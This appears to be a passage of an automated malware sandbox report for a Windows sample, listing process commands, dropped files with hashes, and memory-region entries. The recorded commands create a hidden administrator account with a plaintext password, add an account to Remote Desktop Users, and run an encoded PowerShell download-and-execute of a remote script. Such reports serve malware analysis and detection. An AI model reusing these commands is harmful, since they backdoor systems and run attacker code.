C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 9aDQknBl1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 9aDQknBl2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 9aDQknBl3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES385B.tmpMD5
ac3224d41bce4537262e7f8ba8d78f58
SHA1e5113a1986082373e7ed1f456bc7b16165f5e5f2
SHA2560381df5785f837ae79f0d6ef628ff48d2dbd4df2773656c4cd612dca8dfdffbb
SHA5121922af989c089fbc3c68f49ba7b02a36457ee792d3a44a44dbf4235895ddbbba10c0d7eeb5b3ae8ec556e63e88edbac8228eaa6dedb4c3d66c9b440faa640120
-
C:\Users\Admin\AppData\Local\Temp\Setup.zipMD5
36f178576dcb8db35d6f06448b1eb510
SHA162277c90cc2b1bb81b36571037afe5081b0605d5
SHA256192fed6a13a0e73d5196a43bc72eeac16e4962ce465ea67dd60d8b16368c215a
SHA5129e1dfe8e5196afb5a39d5302d6948cc7282b95c77aba435ed14453094022a302a6c780fbfd2615377d94e2b7e2913601e9129eb6d3398db0ba25344075e5dc96
-
C:\Users\Admin\AppData\Local\Temp\ViJoy.exeMD5
03051f3c44a2c8d196c95ea458b0aff4
SHA1d19a86e11cccdf978ca2d1455d7026d7879869f7
SHA256555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08
SHA512883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46
-
C:\Users\Admin\AppData\Local\Temp\ViJoy.exeMD5
03051f3c44a2c8d196c95ea458b0aff4
SHA1d19a86e11cccdf978ca2d1455d7026d7879869f7
SHA256555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08
SHA512883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46
-
C:\Users\Admin\AppData\Local\Temp\ca1csawe\ca1csawe.dllMD5
726e1b64e82e6db7580e571d65e9ca11
SHA10da75ac717cf19f56fefd0c652476733eb029ea5
SHA2567dc1a57e90035e81a464fd2dccb80690706d2dcc34d6b9e90df3492ca84f733e
SHA512fa5cdc52873fd5185f6e0fb33d74abc947ac8bede7fdc20e7a157ea1e5209ef902e5c346109ef228112fc7a891f143004ad7cc280c2eb6bd0149accd1d4e3a56
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1MD5
43473f4e719958639a9d89e5d8388999
SHA1ccb79eb606a23daa4b3ff8f996a2fbf281f31491
SHA256ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734
SHA5121051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa
-
C:\Users\Admin\AppData\Roaming\Templers\exe1.exeMD5
eaee663dfeb2efcd9ec669f5622858e2
SHA12b96f0d568128240d0c53b2a191467fde440fd93
SHA2566c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
-
C:\Users\Admin\AppData\Roaming\Templers\exe1.exeMD5
eaee663dfeb2efcd9ec669f5622858e2
SHA12b96f0d568128240d0c53b2a191467fde440fd93
SHA2566c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
-
C:\Users\Admin\AppData\Roaming\Templers\exe2.exeMD5
c9622e294a0f3c6c4dfcf716cd2e6692
SHA1829498d010f331248be9fd512deb44d1eceac344
SHA256f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe
SHA512d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552
-
C:\Users\Admin\AppData\Roaming\Templers\exe2.exeMD5
c9622e294a0f3c6c4dfcf716cd2e6692
SHA1829498d010f331248be9fd512deb44d1eceac344
SHA256f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe
SHA512d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exeMD5
27cfb3990872caa5930fa69d57aefe7b
SHA15e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f
SHA25643881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146
SHA512a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exeMD5
27cfb3990872caa5930fa69d57aefe7b
SHA15e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f
SHA25643881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146
SHA512a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exe.configMD5
ad0967a0ab95aa7d71b3dc92b71b8f7a
SHA1ed63f517e32094c07a2c5b664ed1cab412233ab5
SHA2569c1212bc648a2533b53a2d0afcec518846d97630afb013742a9622f0df7b04fc
SHA51285766a907331f60044ec205cf345453fc3d44bfcac296ac93a12e8a752b84290dfd94f73b71de82f46f9503177d29602cbb87549f89dc61373d889b4ea26634b
-
\??\c:\Users\Admin\AppData\Local\Temp\ca1csawe\CSCCA8CC198C1144714B612E13F5E396C81.TMPMD5
a51da7f1861b4b8bd423bd545f0c0265
SHA10a864e1720dfc97f0e4bb53e661ba10c6ff15242
SHA256a36fcfe211505cc87c0a322d0abfee0dd75a9ffb1de6fbbec107c8b7514694ec
SHA5124621e7d87671d7d731672c775473c06d77fb14df08b1999423f0e7aa7ae38d8c17cbe8c97b30fa668fc999c202d89e67aca5726bab7d000dc44c8276c20f5298
-
\??\c:\Users\Admin\AppData\Local\Temp\ca1csawe\ca1csawe.0.csMD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\ca1csawe\ca1csawe.cmdlineMD5
4e052ea9ba7a45545631bdb647d0cece
SHA118737bc8a2515039b73a4b2f11ad1b724c889fac
SHA2567670437a5030cf05789e447da5c1bac276c7b1c108f8d35170a5f6239a79fbad
SHA512e35545b7c5364f04f823a24acde8a2a6dbbbbc30b421a28ea839ab09ad2d26477814b5f50971d1426e31024af24b9da9ea80cdcb5ab627630ba910e7de66d19b
-
\Windows\Branding\mediasrv.pngMD5
271eacd9c9ec8531912e043bc9c58a31
SHA1c86e20c2a10fd5c5bae4910a73fd62008d41233b
SHA256177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934
SHA51287375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0
-
\Windows\Branding\mediasvc.pngMD5
1fa9c1e185a51b6ed443dd782b880b0d
SHA150145abf336a196183882ef960d285bd77dd3490
SHA256f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959
SHA51216bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc
-
memory/680-114-0x0000000000490000-0x0000000000491000-memory.dmpFilesize
4KB
-
memory/680-116-0x0000000002A10000-0x0000000002A12000-memory.dmpFilesize
8KB
-
memory/1536-401-0x0000000000000000-mapping.dmp
-
memory/1684-136-0x0000000000000000-mapping.dmp
-
memory/1684-140-0x0000000003030000-0x0000000003032000-memory.dmpFilesize
8KB
-
memory/1776-165-0x0000000000000000-mapping.dmp
-
memory/1784-281-0x0000000000000000-mapping.dmp
-
memory/1784-317-0x0000015FFD9D0000-0x0000015FFD9D2000-memory.dmpFilesize
8KB
-
memory/1784-318-0x0000015FFD9D3000-0x0000015FFD9D5000-memory.dmpFilesize
8KB
-
memory/1784-319-0x0000015FFD9D6000-0x0000015FFD9D8000-memory.dmpFilesize
8KB
-
memory/1784-328-0x0000015FFD9D8000-0x0000015FFD9DA000-memory.dmpFilesize
8KB
-
memory/1816-141-0x0000000000000000-mapping.dmp
-
memory/1816-177-0x000002A92EB80000-0x000002A92EB81000-memory.dmpFilesize
4KB
-
memory/1816-159-0x000002A915320000-0x000002A915322000-memory.dmpFilesize
8KB
-
memory/1816-161-0x000002A915323000-0x000002A915325000-memory.dmpFilesize
8KB
-
memory/1816-162-0x000002A915326000-0x000002A915328000-memory.dmpFilesize
8KB
-
memory/1816-152-0x000002A92E290000-0x000002A92E291000-memory.dmpFilesize
4KB
-
memory/1816-147-0x000002A92E0E0000-0x000002A92E0E1000-memory.dmpFilesize
4KB
-
memory/1816-191-0x000002A915328000-0x000002A915329000-memory.dmpFilesize
4KB
-
memory/1816-169-0x000002A92E240000-0x000002A92E241000-memory.dmpFilesize
4KB
-
memory/1816-176-0x000002A92E7F0000-0x000002A92E7F1000-memory.dmpFilesize
4KB
-
memory/1988-277-0x0000018CF2586000-0x0000018CF2588000-memory.dmpFilesize
8KB
-
memory/1988-233-0x0000000000000000-mapping.dmp
-
memory/1988-274-0x0000018CF2580000-0x0000018CF2582000-memory.dmpFilesize
8KB
-
memory/1988-275-0x0000018CF2583000-0x0000018CF2585000-memory.dmpFilesize
8KB
-
memory/1988-279-0x0000018CF2588000-0x0000018CF258A000-memory.dmpFilesize
8KB
-
memory/2008-402-0x0000000000000000-mapping.dmp
-
memory/2252-404-0x0000000000000000-mapping.dmp
-
memory/2488-122-0x0000000003010000-0x0000000003011000-memory.dmpFilesize
4KB
-
memory/2488-123-0x0000000005800000-0x0000000005831000-memory.dmpFilesize
196KB
-
memory/2488-117-0x0000000000000000-mapping.dmp
-
memory/2488-120-0x00000000008E0000-0x00000000008E1000-memory.dmpFilesize
4KB
-
memory/3268-125-0x0000000000000000-mapping.dmp
-
memory/3304-132-0x0000017AF5913000-0x0000017AF5915000-memory.dmpFilesize
8KB
-
memory/3304-131-0x0000017AF5910000-0x0000017AF5912000-memory.dmpFilesize
8KB
-
memory/3304-129-0x0000017AF7BF0000-0x0000017AF7E9A000-memory.dmpFilesize
2.7MB
-
memory/3304-124-0x0000000000000000-mapping.dmp
-
memory/3304-134-0x0000017AF5916000-0x0000017AF5917000-memory.dmpFilesize
4KB
-
memory/3304-133-0x0000017AF5915000-0x0000017AF5916000-memory.dmpFilesize
4KB
-
memory/3844-193-0x0000024A39F73000-0x0000024A39F75000-memory.dmpFilesize
8KB
-
memory/3844-228-0x0000024A39F78000-0x0000024A39F7A000-memory.dmpFilesize
8KB
-
memory/3844-184-0x0000000000000000-mapping.dmp
-
memory/3844-192-0x0000024A39F70000-0x0000024A39F72000-memory.dmpFilesize
8KB
-
memory/3844-227-0x0000024A39F76000-0x0000024A39F78000-memory.dmpFilesize
8KB
-
memory/3860-160-0x0000000000000000-mapping.dmp
-
memory/4100-400-0x0000000000000000-mapping.dmp
-
memory/4180-403-0x0000000000000000-mapping.dmp
-
memory/4272-338-0x0000000000000000-mapping.dmp
-
memory/4292-339-0x0000000000000000-mapping.dmp
-
memory/4292-420-0x000001EBE9250000-0x000001EBE9252000-memory.dmpFilesize
8KB
-
memory/4292-406-0x0000000000000000-mapping.dmp
-
memory/4292-421-0x000001EBE9253000-0x000001EBE9255000-memory.dmpFilesize
8KB
-
memory/4292-425-0x000001EBE9256000-0x000001EBE9258000-memory.dmpFilesize
8KB
-
memory/4292-477-0x000001EBE9258000-0x000001EBE9259000-memory.dmpFilesize
4KB
-
memory/4296-405-0x0000000000000000-mapping.dmp
-
memory/4312-340-0x0000000000000000-mapping.dmp
-
memory/4496-377-0x0000000000000000-mapping.dmp
-
memory/4516-378-0x0000000000000000-mapping.dmp
-
memory/4548-381-0x0000000000000000-mapping.dmp
-
memory/4564-382-0x0000000000000000-mapping.dmp
-
memory/4580-383-0x0000000000000000-mapping.dmp
-
memory/4600-384-0x0000000000000000-mapping.dmp
-
memory/4620-385-0x0000000000000000-mapping.dmp
-
memory/4636-386-0x0000000000000000-mapping.dmp
-
memory/4652-387-0x0000000000000000-mapping.dmp
-
memory/4672-388-0x0000000000000000-mapping.dmp
-
memory/4780-391-0x0000000000000000-mapping.dmp
-
memory/4800-392-0x0000000000000000-mapping.dmp
-
memory/4860-393-0x0000000000000000-mapping.dmp
-
memory/4880-394-0x0000000000000000-mapping.dmp
-
memory/4928-492-0x0000000000000000-mapping.dmp
-
memory/4940-395-0x0000000000000000-mapping.dmp
-
memory/4956-491-0x0000000000000000-mapping.dmp
-
memory/4960-396-0x0000000000000000-mapping.dmp
-
memory/5020-397-0x0000000000000000-mapping.dmp
-
memory/5040-398-0x0000000000000000-mapping.dmp
-
memory/5100-399-0x0000000000000000-mapping.dmp